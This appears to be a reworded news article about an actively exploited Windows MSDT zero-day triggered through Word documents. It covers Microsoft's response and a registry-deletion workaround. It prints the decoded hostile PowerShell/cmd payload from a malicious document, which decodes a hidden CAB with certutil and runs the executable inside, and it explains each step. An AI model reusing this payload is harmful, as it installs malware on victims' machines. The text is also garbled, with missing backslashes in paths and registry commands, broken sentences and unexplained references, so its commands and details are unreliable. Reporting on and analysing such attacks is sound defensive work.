The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

A critical code execution zero-day in all supported versions of Windows has been under active exploit for seven weeks, giving attackers a reliable means for installing malware without triggering Windows Defender and a roster of other endpoint protection products.

The Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild. The Microsoft Security Response Center team didn't consider the reported behavior a security vulnerability because the diagnostic tool required a password before it would execute payloads, according to a response dated April 21.

Uh, nevermind

Microsoft reversed course on Monday and warned for the first time that the reported behavior constituted a critical vulnerability.

An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can install programs, view, change, or create new accounts in the context of the user's rights.

At the time of the story's publication, Microsoft had yet to issue a patch. It was telling customers to disabling the URL Protocol.

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOTms-msdt filename"
  3. Execute the command "reg delete HKEY_CLASSES_ROOTms-msdt /f"

A Word document uploaded to VirusTotal on Friday exploited a previously unknown vulnerability that was missed by Microsoft.

The document uses Word to retrieve anHTML file from a remote web server according to analysis by researcher Kevin Beaumont. The document uses theMSProtocol URI scheme to load and execute commands.

Advertisement

That should not be possible.

It is possible.

The commands in the document are translated.

$cmd = "c:windowssystem32cmd.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r

%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

The script is said to be by researcher John Hammond of Huntress.

  • Starts hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
      • Store this Base64 encoded CAB file as 1.t
      • Decode the Base64 encoded CAB file to be saved as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)

The August 2020 academic paper showed how to use the code execution tool. It is possible that the company's security team failed to grasp the potential for this behavior to be exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in what is known as protected view, a mode that blocks macros and other potentially harmful functions. If the document is loaded as a Rich Text Format file, it will run without even opening the document, let alone Protected View.

Huntress researchers wrote that the Preview Pane within Windows Explorer can be used to initiate the invocation of this exploit.

Researchers discovered a Word file that exploits the same zero-day as the document uploaded to VirusTotal on Friday.

Organizations that use Microsoft Office should investigate how the vulnerability affects their networks. It is not likely that disabling the URL Protocol will cause major disruptions in the short run. Until Microsoft releases more details and guidance, Office users should turn the protocol off and give any documents downloaded over the Internet additional scrutiny.